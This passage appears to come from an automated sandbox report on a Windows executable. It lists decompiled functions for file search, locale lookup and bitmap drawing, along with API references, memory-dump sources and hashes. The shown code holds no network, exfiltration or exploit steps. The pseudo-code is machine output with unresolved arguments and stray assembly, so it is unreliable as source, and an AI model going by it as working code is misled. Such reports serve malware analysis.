                                                            • Instruction Fuzzy Hash: 44119371704100ABDA15AB27DC8296B365ADFC5364B10493FF809EF2C6DA3DDC0A8699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040EB16, Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                            • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                            • Instruction ID: 9a129490767a9822db482bfa393921b2fcf1aa7a937d9a2231ce8cb683432473
                                                            • Opcode Fuzzy Hash: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                            • Instruction Fuzzy Hash: 9A310C30D04608EFDB11EBA6C886A9EB7B5EF48304F5045FAA405B73D1D778AF45CA58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040EA04, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(?), ref: 0040EA0C
                                                            • FindClose.KERNEL32(00000000,?), ref: 0040EA16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                            • Instruction ID: 6a2226afb0a8b14f7d31ab3cf4cdd30a4af029b65c76461fbe821aedbeee1211
                                                            • Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                            • Instruction Fuzzy Hash: 78C08C64E081402BC80023B6CC0282B3008FA84348F840926759BF22C2D93E89248A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403CB4, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 51%
                                                            			E00403CB4(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x403d1a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004031F4( &_v20, 7,  &_v15);
				E0040269C(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00403D21);
				return E00403094( &_v20);
			}








                                                            0x00403cbd
                                                            0x00403cc2
                                                            0x00403cc3
                                                            0x00403cc8
                                                            0x00403ccb
                                                            0x00403cda
                                                            0x00403cea
                                                            0x00403cf5
                                                            0x00403d00
                                                            0x00403d00
                                                            0x00403d06
                                                            0x00403d09
                                                            0x00403d0c
                                                            0x00403d19

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                            • Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
                                                            • Opcode Fuzzy Hash: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                            • Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040D74C, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                            • Instruction ID: 7765dcfaf0ac3467b05695104e180fa3b916594c574afae56f7b81e2f936b299
                                                            • Opcode Fuzzy Hash: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                            • Instruction Fuzzy Hash: F4F06D31A04309EFEB15DFA1CC51ADEF779FB84714F508576A510675C1D7B82604C758
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040F270, Relevance: 1.5, APIs: 1, Instructions: 10timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID:
                                                            • API String ID: 481472006-0
                                                            • Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                            • Instruction ID: 4be9079c8441ee73391fb420eaf64c5b500e0d105d5474b8364197a0399cc555
                                                            • Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                            • Instruction Fuzzy Hash: 23C08C3980450652C600BB64DC0284AB6A8AEC0200F8089BEA4CCD21E1EB39D31DC3C7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040627C, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E0040627C(void* __eax, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* _t59;
				struct HBITMAP__* _t62;
				void* _t68;
				void* _t71;
				int _t72;
				int _t75;
				int _t80;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t100;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t119;
				signed int _t121;
				struct HBITMAP__* _t124;
				struct HBITMAP__* _t125;
				RECT* _t126;
				void* _t128;

				_t128 = __eflags;
				_push(__eax);
				E00406144(__eax);
				_pop(_t59);
				if(_t128 != 0) {
					asm("pushad");
					_t100 = _t59;
					 *((intOrPtr*)(_t100 + 0x34))();
					 *((intOrPtr*)(_t100 + 0x28)) = 0;
					 *((intOrPtr*)(_t100 + 0x56)) = 0;
					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
					asm("jecxz 0x13");
					_t62 =  *(_t100 + 0x3d);
					_t121 =  *(_t62 + 4);
					_t119 =  *(_t62 + 8);
					if(_t119 < 0) {
						_t119 =  ~_t119;
					}
					_push(0);
					L00404108();
					_push(_t62);
					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
					if( *((char*)(_t100 + 0x3c)) != 1) {
						asm("jecxz 0xfffffff2");
						_t124 = 0;
						_t110 =  *(_t100 + 0x18);
						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
						__eflags =  *(_t100 + 0x49) - 5;
						if( *(_t100 + 0x49) == 5) {
							E0040600C(_t67, _t110);
						}
						_pop(_t68);
						_push(_t68);
						_push(E00406268(_t68) *  *(_t100 + 0x18));
						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
						_push(_t71);
						_push(0);
						_push(_v12);
						_push(_t71);
						_t72 =  *(_t100 + 0x18);
						__eflags = _t72 - _t119;
						if(__eflags > 0) {
							_t72 = _t119;
						}
						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
						_t113 =  *(_t100 + 0x18);
						__eflags = _t113 - _t119;
						if(_t113 > _t119) {
							_t113 = _t119;
						}
						__eflags = _t75 - _t113;
						if(__eflags != 0) {
							_pop(_t81);
							E00402468(_t81);
							_push(0);
							_push(0);
							_push(0);
							_push(_t126);
							_push(0);
							_push(_v40);
							_push(_v36);
							L00404110();
							_t121 = _t121 ^ 0xffffffff;
							_t124 = 0;
							_t85 = SelectObject(_v60, 0);
							_t113 = _v68;
							__eflags = 0;
							E00406094(_t100, 0, _v68, 0, 0);
							SelectObject(_v72, _t85);
						}
						E00406024(_t100, _t100, _t113, __eflags);
						_pop( *_t47);
						_pop( *_t48);
						_pop( *_t49);
						 *(_t100 + 0x20) = _t124;
						__eflags = _t121;
						 *(_t100 + 0x72) = 0;
						if(_t121 < 0) {
							_t52 = _t100 + 0x72;
							 *_t52 =  *(_t100 + 0x72) + 1;
							__eflags =  *_t52;
						}
					} else {
						_push(0);
						L00404178();
						_push(_t62);
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(_t62);
						L00404100();
						_t125 = _t62;
						L00404190();
						_t116 = 0;
						_push(_t116);
						_push(SelectObject(_t116, _t125));
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(0);
						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
						_t117 = _t126;
						FillRect(_v44, _t126, _t94);
						DeleteObject(_t94);
						asm("jecxz 0x24");
						SelectObject(_v60, 0);
						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
						E00406024(_t100, _t100, _t117, _t130);
						 *(_t100 + 0x20) = _t125;
					}
					asm("jecxz 0xa");
					_pop(_t114);
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
					_t80 = DeleteDC(_t119);
					asm("popad");
					return _t80;
				}
				return _t59;
			}






























                                                            0x0040627c
                                                            0x0040627c
                                                            0x0040627d
                                                            0x00406282
                                                            0x00406283
                                                            0x00406289
                                                            0x0040628a
                                                            0x0040628c
                                                            0x00406291
                                                            0x00406294
                                                            0x00406297
                                                            0x004062a3
                                                            0x004062a5
                                                            0x004062a8
                                                            0x004062ab
                                                            0x004062b0
                                                            0x004062b2
                                                            0x004062b2
                                                            0x004062d5
                                                            0x004062d7
                                                            0x004062dc
                                                            0x004062dd
                                                            0x004062e1
                                                            0x00406397
                                                            0x00406399
                                                            0x0040639e
                                                            0x004063a6
                                                            0x004063a7
                                                            0x004063ab
                                                            0x004063ad
                                                            0x004063ad
                                                            0x004063b2
                                                            0x004063b3
                                                            0x004063be
                                                            0x004063bf
                                                            0x004063c4
                                                            0x004063c5
                                                            0x004063c7
                                                            0x004063cb
                                                            0x004063cc
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063e4
                                                            0x004063e9
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f0
                                                            0x004063f0
                                                            0x004063f2
                                                            0x004063f4
                                                            0x004063f6
                                                            0x004063f7
                                                            0x004063fe
                                                            0x00406405
                                                            0x00406406
                                                            0x00406407
                                                            0x00406408
                                                            0x0040640a
                                                            0x0040640b
                                                            0x0040640f
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641d
                                                            0x00406423
                                                            0x00406427
                                                            0x0040642c
                                                            0x00406435
                                                            0x00406435
                                                            0x0040643c
                                                            0x00406441
                                                            0x00406444
                                                            0x00406447
                                                            0x0040644a
                                                            0x0040644d
                                                            0x0040644f
                                                            0x00406453
                                                            0x00406455
                                                            0x00406455
                                                            0x00406455
                                                            0x00406455
                                                            0x004062e7
                                                            0x004062e7
                                                            0x004062e9
                                                            0x004062ee
                                                            0x004062ef
                                                            0x004062f2
                                                            0x004062f5
                                                            0x004062f6
                                                            0x004062fb
                                                            0x004062fe
                                                            0x00406303
                                                            0x00406304
                                                            0x0040630c
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406320
                                                            0x00406325
                                                            0x0040632e
                                                            0x00406333
                                                            0x0040633e
                                                            0x00406344
                                                            0x0040635b
                                                            0x00406378
                                                            0x0040637d
                                                            0x0040637d
                                                            0x0040645b
                                                            0x0040645d
                                                            0x00406463
                                                            0x00406465
                                                            0x0040646a
                                                            0x00000000
                                                            0x0040646a
                                                            0x0040646b

                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                            • 72E7A590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                            • 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                            • 72E7A520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                            • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                            • SelectObject.GDI32(00000000), ref: 00406307
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                            • FillRect.USER32 ref: 0040632E
                                                            • DeleteObject.GDI32(?), ref: 00406333
                                                            • SelectObject.GDI32(?), ref: 00406344
                                                            • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                            • SelectObject.GDI32(00000000,?), ref: 00406371
                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                            • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                            • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                            • SelectObject.GDI32(?,00000000), ref: 00406435
                                                            • DeleteDC.GDI32 ref: 00406465
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                            • String ID:
                                                            • API String ID: 2504469172-0
                                                            • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                            • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                            • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                            • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040FD14, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                            • 72E7A590.GDI32(00000000), ref: 0040FD6F
                                                            • 72E7AC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                            • 72E7A520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                            • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                            • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                            • FillRect.USER32 ref: 0040FDC6
                                                            • DeleteObject.GDI32(?), ref: 0040FDCB
                                                            • SelectObject.GDI32(?), ref: 0040FDDC
                                                            • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                            • SelectObject.GDI32(?), ref: 0040FE09
                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                            • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                            • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                            • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                            • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                            • String ID:
                                                            • API String ID: 2504469172-0
                                                            • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                            • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                            • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                            • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406218, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 57%
                                                            			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* __ebx;
				void* _t64;
				void* _t66;
				struct HBITMAP__* _t69;
				void* _t75;
				void* _t78;
				int _t79;
				int _t82;
				int _t87;
				void* _t88;
				void* _t92;
				void* _t101;
				void* _t108;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t133;
				struct HDC__* _t135;
				struct HDC__* _t137;
				void* _t139;
				int* _t140;
				struct HDC__* _t142;
				signed int _t144;
				struct HBITMAP__* _t147;
				struct HBITMAP__* _t148;
				RECT* _t149;
				void* _t151;

				_t151 = __eflags;
				_t113 = __eax;
				_t64 = E00406144(__eax);
				if(_t151 == 0) {
					L7:
					if(__eflags != 0) {
						E00406144(_t64);
						_t66 = _t64;
						if(__eflags != 0) {
							asm("pushad");
							_t115 = _t66;
							 *((intOrPtr*)(_t115 + 0x34))();
							 *((intOrPtr*)(_t115 + 0x28)) = 0;
							 *((intOrPtr*)(_t115 + 0x56)) = 0;
							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
							asm("jecxz 0x13");
							_t69 =  *(_t115 + 0x3d);
							_t144 =  *(_t69 + 4);
							_t142 =  *(_t69 + 8);
							__eflags = _t142;
							if(_t142 < 0) {
								_t142 =  ~_t142;
							}
							_push(0);
							L00404108();
							_push(_t69);
							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
							if( *((char*)(_t115 + 0x3c)) != 1) {
								asm("jecxz 0xfffffff2");
								_t147 = 0;
								_t129 =  *(_t115 + 0x18);
								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
								__eflags =  *(_t115 + 0x49) - 5;
								if( *(_t115 + 0x49) == 5) {
									E0040600C(_t74, _t129);
								}
								_pop(_t75);
								_push(_t75);
								_push(E00406268(_t75) *  *(_t115 + 0x18));
								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
								_push(_t78);
								_push(0);
								_push(_v12);
								_push(_t78);
								_t79 =  *(_t115 + 0x18);
								__eflags = _t79 - _t142;
								if(__eflags > 0) {
									_t79 = _t142;
								}
								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
								_t132 =  *(_t115 + 0x18);
								__eflags = _t132 - _t142;
								if(_t132 > _t142) {
									_t132 = _t142;
								}
								__eflags = _t82 - _t132;
								if(__eflags != 0) {
									_pop(_t88);
									E00402468(_t88);
									_push(0);
									_push(0);
									_push(0);
									_push(_t149);
									_push(0);
									_push(_v40);
									_push(_v36);
									L00404110();
									_t144 = _t144 ^ 0xffffffff;
									_t147 = 0;
									_t92 = SelectObject(_v60, 0);
									_t132 = _v68;
									__eflags = 0;
									E00406094(_t115, 0, _v68, 0, 0);
									SelectObject(_v72, _t92);
								}
								E00406024(_t115, _t115, _t132, __eflags);
								_pop( *_t51);
								_pop( *_t52);
								_pop( *_t53);
								 *(_t115 + 0x20) = _t147;
								__eflags = _t144;
								 *(_t115 + 0x72) = 0;
								if(_t144 < 0) {
									_t56 = _t115 + 0x72;
									 *_t56 =  &( *(_t115 + 0x72)->i);
									__eflags =  *_t56;
								}
								goto L25;
							} else {
								_push(0);
								L00404178();
								_push(_t69);
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(_t69);
								L00404100();
								_t148 = _t69;
								L00404190();
								_t135 = 0;
								_push(_t135);
								_push(SelectObject(_t135, _t148));
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(0);
								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
								_t136 = _t149;
								FillRect(_v44, _t149, _t101);
								DeleteObject(_t101);
								asm("jecxz 0x24");
								SelectObject(_v60, 0);
								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
								E00406024(_t115, _t115, _t136, __eflags);
								 *(_t115 + 0x20) = _t148;
								L25:
								asm("jecxz 0xa");
								_pop(_t133);
								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
								_t87 = DeleteDC(_t142);
								asm("popad");
								return _t87;
							}
						}
						return _t66;
					} else {
						return _t64;
					}
				} else {
					_push(__edx);
					_t64 = E0040648C(_t113, __edx);
					_pop(_t137);
					if(_t64 == _t137) {
						goto L7;
					} else {
						_t108 = _t113;
						if(_t137 != 0) {
							 *(_t113 + 0x49) = _t137;
							__eflags = _t137 - 5;
							if(_t137 == 5) {
								_t137 = _t137 - 1;
								__eflags = _t137;
							}
							L27();
							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
							_t139 = _t137;
							__eflags = _t111 - _t139;
							_t64 = _t113;
							goto L7;
						} else {
							_t140 =  &(_t137->i);
							if(_t140 !=  *(_t108 + 0x3c)) {
								 *(_t108 + 0x3c) = _t140;
								L9();
								return _t108;
							}
							return _t108;
						}
					}
				}
			}






































                                                            0x00406218
                                                            0x00406219
                                                            0x0040621b
                                                            0x00406220
                                                            0x0040625d
                                                            0x0040625e
                                                            0x0040627d
                                                            0x00406282
                                                            0x00406283
                                                            0x00406289
                                                            0x0040628a
                                                            0x0040628c
                                                            0x00406291
                                                            0x00406294
                                                            0x00406297
                                                            0x004062a3
                                                            0x004062a5
                                                            0x004062a8
                                                            0x004062ab
                                                            0x004062ae
                                                            0x004062b0
                                                            0x004062b2
                                                            0x004062b2
                                                            0x004062d5
                                                            0x004062d7
                                                            0x004062dc
                                                            0x004062dd
                                                            0x004062e1
                                                            0x00406397
                                                            0x00406399
                                                            0x0040639e
                                                            0x004063a6
                                                            0x004063a7
                                                            0x004063ab
                                                            0x004063ad
                                                            0x004063ad
                                                            0x004063b2
                                                            0x004063b3
                                                            0x004063be
                                                            0x004063bf
                                                            0x004063c4
                                                            0x004063c5
                                                            0x004063c7
                                                            0x004063cb
                                                            0x004063cc
                                                            0x004063cf
                                                            0x004063d1
                                                            0x004063d3
                                                            0x004063d3
                                                            0x004063e4
                                                            0x004063e9
                                                            0x004063ec
                                                            0x004063ee
                                                            0x004063f0
                                                            0x004063f0
                                                            0x004063f2
                                                            0x004063f4
                                                            0x004063f6
                                                            0x004063f7
                                                            0x004063fe
                                                            0x00406405
                                                            0x00406406
                                                            0x00406407
                                                            0x00406408
                                                            0x0040640a
                                                            0x0040640b
                                                            0x0040640f
                                                            0x00406414
                                                            0x00406417
                                                            0x0040641d
                                                            0x00406423
                                                            0x00406427
                                                            0x0040642c
                                                            0x00406435
                                                            0x00406435
                                                            0x0040643c
                                                            0x00406441
                                                            0x00406444
                                                            0x00406447
                                                            0x0040644a
                                                            0x0040644d
                                                            0x0040644f
                                                            0x00406453
                                                            0x00406455
                                                            0x00406455
                                                            0x00406455
                                                            0x00406455
                                                            0x00000000
                                                            0x004062e7
                                                            0x004062e7
                                                            0x004062e9
                                                            0x004062ee
                                                            0x004062ef
                                                            0x004062f2
                                                            0x004062f5
                                                            0x004062f6
                                                            0x004062fb
                                                            0x004062fe
                                                            0x00406303
                                                            0x00406304
                                                            0x0040630c
                                                            0x0040630d
                                                            0x00406310
                                                            0x00406313
                                                            0x00406320
                                                            0x00406325
                                                            0x0040632e
                                                            0x00406333
                                                            0x0040633e
                                                            0x00406344
                                                            0x0040635b
                                                            0x00406378
                                                            0x0040637d
                                                            0x00406458
                                                            0x0040645b
                                                            0x0040645d
                                                            0x00406463
                                                            0x00406465
                                                            0x0040646a
                                                            0x00000000
                                                            0x0040646a
                                                            0x004062e1
                                                            0x0040646b
                                                            0x00406264
                                                            0x00406264
                                                            0x00406264
                                                            0x00406222
                                                            0x00406224
                                                            0x00406225
                                                            0x0040622a
                                                            0x0040622d
                                                            0x00000000
                                                            0x0040622f
                                                            0x00406231
                                                            0x00406233
                                                            0x0040623c
                                                            0x0040623f
                                                            0x00406242
                                                            0x00406244
                                                            0x00406244
                                                            0x00406244
                                                            0x00406248
                                                            0x00406254
                                                            0x00406259
                                                            0x0040625a
                                                            0x0040625c
                                                            0x00000000
                                                            0x00406235
                                                            0x00406236
                                                            0x0040647f
                                                            0x00406481
                                                            0x00406484
                                                            0x00000000
                                                            0x00406484
                                                            0x00406489
                                                            0x00406489
                                                            0x00406233
                                                            0x0040622d

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp Download File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                            • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                            • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                            • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040FCB0, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp Download File
